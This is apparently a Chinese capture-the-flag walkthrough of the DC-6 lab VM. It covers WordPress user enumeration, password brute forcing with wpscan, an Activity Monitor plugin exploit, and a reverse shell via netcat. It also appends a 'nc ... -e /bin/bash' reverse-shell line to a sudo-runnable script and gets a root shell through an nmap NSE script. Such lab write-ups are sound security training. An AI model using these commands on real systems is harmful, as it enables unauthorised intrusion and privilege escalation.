1.主机发现:sudo arp-scan -l,发现靶机ip为192.168.225.144
2.扫描端口,开启了80和22端口
nmap 192.168.225.144 -sV -sC -Pn -n -v -T5 -p-
3.访问页面,发现页面被重定向到页面跳转到了http://wordy,跟前面的DC-2一样,在\etc\hosts文件中增加wordy,保存后重新访问
4.使用dirsearch扫到后台登录路径wp-admin和readme.txt文件,获得了版本4.7:
python dirsearch.py -u http://192.168.225.144/ -e * -i 200
3.发现是wordpress站点,可以使用专门的wpscan进行用户枚举,发现包括admin的5个用户,将他们保存为一个txt:
wpscan --url http://wordy/ -e u
4.有了用户就使用wpscan对用户名进行爆破,为了缩短爆破时间,根据提示制作一个密码字典,rockyou.txt有几十万条数据,作者给了过滤的条件,最后密码做出来有2000多行生成密码字典:
cat /usr/share/wordlists/rockyou.txt | grep k01 >passwords.txt
5.开始爆破:
wpscan --url http://wordy --enumerate u -P /root/桌面/passwords.txt
6.使用爆破出来的密码登录http://wordy/wp-admin/可以看到安装了activity_monitor插件
7.百度查询该插件,发现存在漏洞:
8.老办法:searchsploit activity monitor,最后一个是wordpress的:
9.把文件拷贝到当前目录下,查看下这个文件
cp /usr/share/exploitdb/exploits/php/webapps/45274.html /root
10.发现是个csrf漏洞,修改一下这个html文件:
至于这里为什么说结合了CSRF,估计是因为网站也没有考虑来的网页的来源,即referer。这样就导致我们可以制作一个表单提交,在这个表单中我们就不会被限制长度了。
11.在kali上监听9999端口,打开html文件:
nc -lvp 9999
file:///root/45274.html
12.点击submit,成功反弹shell后,改为交互式界面:
python -c 'import pty;pty.spawn("/bin/bash")'13.首先来到home目录下,查看用户,在jens中找到backups.sh,在mark中找到things-to-do.txt,加了一个用户graham-GSo7isUM1D4:
14.那么用这个新用户来登录一下:sudo -l查看一下权限发现jens用户可以免密登录backups.sh
15.在backups.sh中插入nc 192.168.225.133 6666 -e /bin/bash,然后监听5555端口,并使用sudo执行backups.sh,使其弹回jens权限的shell:
echo 'nc 192.168.225.133 5555 -e /bin/bash' > backups.sh
sudo -u jens ./backups.sh //执行shell文件16.反弹了jens的shell,同样改为交互式shell:
python -c 'import pty;pty.spawn("/bin/bash")'17.发现还是普通用户,继续提权,但是sudo -l发现nmap命令是root权限,不需要密码,可以用来提权:
原理:以root权限执行nmap,然后nmap执行脚本,脚本执行/bin/sh,获取root权限shell
echo 'os.execute("/bin/sh")' > dc6.nse
sudo nmap --script=dc6.nse
18.进入根目录找到flag
以下是nmap及其他提权文章:
https://www.anquanke.com/post/id/158511
1万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
